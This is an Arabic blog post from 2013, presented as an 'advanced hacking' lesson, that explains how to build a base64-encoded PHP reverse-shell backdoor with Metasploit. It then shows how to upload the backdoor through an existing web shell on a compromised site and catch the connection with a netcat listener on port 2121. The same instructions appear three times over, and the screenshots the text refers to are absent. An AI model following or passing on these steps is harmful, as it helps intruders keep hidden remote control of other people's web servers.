الاثنين، 15 أبريل 2013
من دروس الاختراق المتقدم
عمل باك دور بالميتاسبلويت والإتصال به من خلال أداة النت كات ...
نقوم بفتح أداة Metasploit Console وبعد أن تفتح نقوم بتنفيذ عدة أوامر لتكوين الباك الدور
الأمر رقم ( 1 ) لتحديد البايلود الذي سيستخدم لصناعة ملف الباك دور .
use payload/php/reverse_php
الأمر رقم ( 2 ) لتحديد الأي بي الخاص بنا لإستقبال الإتصال العكسي .
set LHOST your ip
الأمر رقم ( 3 ) لتحديد بورت أو منفذ الخاص لإستقبال الإتصال العكسي .
set LPORT 2121
الأمر رقم ( 4 ) لتحديد نوع التشفير الذي سيستخدم لتشفير الباك دور .
set encoder php/base64
بعد ذلك تبقى أمامنا خطوتين الخطوة الأولى تنفيذ أمر صناعة البايلود المشفر من خلال كتابة الأمر التالي : ..
generate -t raw
سينتج عن الأمر السابق تكون أكواد مشفرة كما نقوم بتحديد الكود
بعد ذلك نقوم بفتح المفكرة notebad ونقوم بوضع كود لغة php بداية ونهاية
الصفحة كما ، وفي المنطقة التي بين الكودين والمحددة بالرقم ( 2 ) نقوم
بلصق الكود المشفر الذي نسخناه من أداة الميتا سابقاً ..
بعد ذلك نقوم بحفظ الملف بامتداد php
بعد ذلك نقوم برفع ملف الباك دور إلى الشيل
بعد رفع الملف على الشيل نقوم بتشغيل أداة netcat وتنفيذ أمر التنصت للبورت 2121 من خلال الأمر التالي :
كود:
nc -lvp 2121
الأن نقوم بتشغيل ملف الباك دور في الشيل من خلال استدعائة من المتصفح
بعد تشغيل الباك دور نتوجه لأداة الــ netcat نجاح عملية الإتصال العكسي وتم تأكيد ذلك من خلال أمر الإستعراض
عمل باك دور بالميتاسبلويت والإتصال به من خلال أداة النت كات ...
نقوم بفتح أداة Metasploit Console وبعد أن تفتح نقوم بتنفيذ عدة أوامر لتكوين الباك الدور
الأمر رقم ( 1 ) لتحديد البايلود الذي سيستخدم لصناعة ملف الباك دور .
use payload/php/reverse_php
الأمر رقم ( 2 ) لتحديد الأي بي الخاص بنا لإستقبال الإتصال العكسي .
set LHOST your ip
الأمر رقم ( 3 ) لتحديد بورت أو منفذ الخاص لإستقبال الإتصال العكسي .
set LPORT 2121
الأمر رقم ( 4 ) لتحديد نوع التشفير الذي سيستخدم لتشفير الباك دور .
set encoder php/base64
بعد ذلك تبقى أمامنا خطوتين الخطوة الأولى تنفيذ أمر صناعة البايلود المشفر من خلال كتابة الأمر التالي : ..
generate -t raw
سينتج عن الأمر السابق تكون أكواد مشفرة كما نقوم بتحديد الكود
بعد ذلك نقوم بفتح المفكرة notebad ونقوم بوضع كود لغة php بداية ونهاية الصفحة كما ، وفي المنطقة التي بين الكودين والمحددة بالرقم ( 2 ) نقوم بلصق الكود المشفر الذي نسخناه من أداة الميتا سابقاً ..
بعد ذلك نقوم بحفظ الملف بامتداد php
بعد ذلك نقوم برفع ملف الباك دور إلى الشيل
بعد رفع الملف على الشيل نقوم بتشغيل أداة netcat وتنفيذ أمر التنصت للبورت 2121 من خلال الأمر التالي :
كود:
nc -lvp 2121
الأن نقوم بتشغيل ملف الباك دور في الشيل من خلال استدعائة من المتصفح
بعد تشغيل الباك دور نتوجه لأداة الــ netcat نجاح عملية الإتصال العكسي وتم تأكيد ذلك من خلال أمر الإستعراض
نقوم بفتح أداة Metasploit Console وبعد أن تفتح نقوم بتنفيذ عدة أوامر لتكوين الباك الدور
الأمر رقم ( 1 ) لتحديد البايلود الذي سيستخدم لصناعة ملف الباك دور .
use payload/php/reverse_php
الأمر رقم ( 2 ) لتحديد الأي بي الخاص بنا لإستقبال الإتصال العكسي .
set LHOST your ip
الأمر رقم ( 3 ) لتحديد بورت أو منفذ الخاص لإستقبال الإتصال العكسي .
set LPORT 2121
الأمر رقم ( 4 ) لتحديد نوع التشفير الذي سيستخدم لتشفير الباك دور .
set encoder php/base64
بعد ذلك تبقى أمامنا خطوتين الخطوة الأولى تنفيذ أمر صناعة البايلود المشفر من خلال كتابة الأمر التالي : ..
generate -t raw
سينتج عن الأمر السابق تكون أكواد مشفرة كما نقوم بتحديد الكود
بعد ذلك نقوم بفتح المفكرة notebad ونقوم بوضع كود لغة php بداية ونهاية الصفحة كما ، وفي المنطقة التي بين الكودين والمحددة بالرقم ( 2 ) نقوم بلصق الكود المشفر الذي نسخناه من أداة الميتا سابقاً ..
بعد ذلك نقوم بحفظ الملف بامتداد php
بعد ذلك نقوم برفع ملف الباك دور إلى الشيل
بعد رفع الملف على الشيل نقوم بتشغيل أداة netcat وتنفيذ أمر التنصت للبورت 2121 من خلال الأمر التالي :
كود:
nc -lvp 2121
الأن نقوم بتشغيل ملف الباك دور في الشيل من خلال استدعائة من المتصفح
بعد تشغيل الباك دور نتوجه لأداة الــ netcat نجاح عملية الإتصال العكسي وتم تأكيد ذلك من خلال أمر الإستعراض
0 التعليقات:
إرسال تعليق